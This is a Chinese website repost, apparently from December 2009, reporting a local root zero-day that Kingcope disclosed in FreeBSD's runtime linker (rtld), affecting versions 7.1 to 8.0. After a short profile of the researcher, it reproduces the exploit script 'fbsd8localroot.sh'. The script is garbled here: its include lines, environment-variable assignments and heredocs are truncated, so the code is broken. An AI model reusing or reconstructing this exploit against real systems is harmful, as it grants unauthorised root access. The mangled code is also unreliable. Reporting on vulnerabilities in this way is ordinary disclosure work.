设为首页收藏本站

水盟网

 找回密码
 加盟

QQ登录

只需一步,快速开始

搜索
水盟网 主页 软件园地 查看内容

FreeBSD爆严重安全漏洞

09-12-3 07:50| 发布者: 毒药| 查看: 232| 评论: 0

在圣诞节即将到来的日子,以安全著称的FreeBSD系统被著名黑客Kingcope爆了一个零日(0day)漏洞。据Kingcope所说,他长期致力于挖掘FreeBSD系统的本地提权漏洞,终于有幸在近期发现了这个非常低级的本地提权漏洞;这个漏洞存在于FreeBSD的Run-Time Link-Editor(rtld)程序中,普通用户可以通过该漏洞非常轻易的获得root权限。该漏洞影响非常广泛,包括FreeBSD 7.1至8.0的32及64位系统。

     在展示该漏洞威力之前,我们科普一下著名黑客kingcope。从2007年6月至今,他一共公开了12个安全漏洞(没公开的不知道有多少),其中 FreeBSD和Sun Solaris各两个,微软四个,Oracle、mysql、NcFTPD和nginx各一个,同时他还编写了多个漏洞的攻击代码,例如 Sun Solaris telnetd及近期的IIS FTPd、Debian OpenSSH等。
接下来我们在最新的 FreeBSD 8.0中重现一下该漏洞的攻击过程,请注意图中的红色部分;我们只要执行名为fbsd8localroot.sh的脚本,就可以轻易的获得root权限。

相关脚本如下:

echo “FreeBSD local r00t zeroday by Kingcope on November cat #include main() {
       
       environ        environ[       environ[       strcpy(environ[       execl(”}
_EOF
gcc env.c 
#download from baoz.net
cat 
#include #include #include #include               environ       system(”echo ALEX}
_EOF
gcc 
 .


FreeBSD尚未就该0day漏洞发布安全公告及官方补丁,敬请关注素包子的博客http://baoz.net/freebsd8-localroot-0day/以获取该漏洞的最新情况。


鸡蛋

鲜花

雷人

握手

搞笑
发表评论

最新评论

返回顶部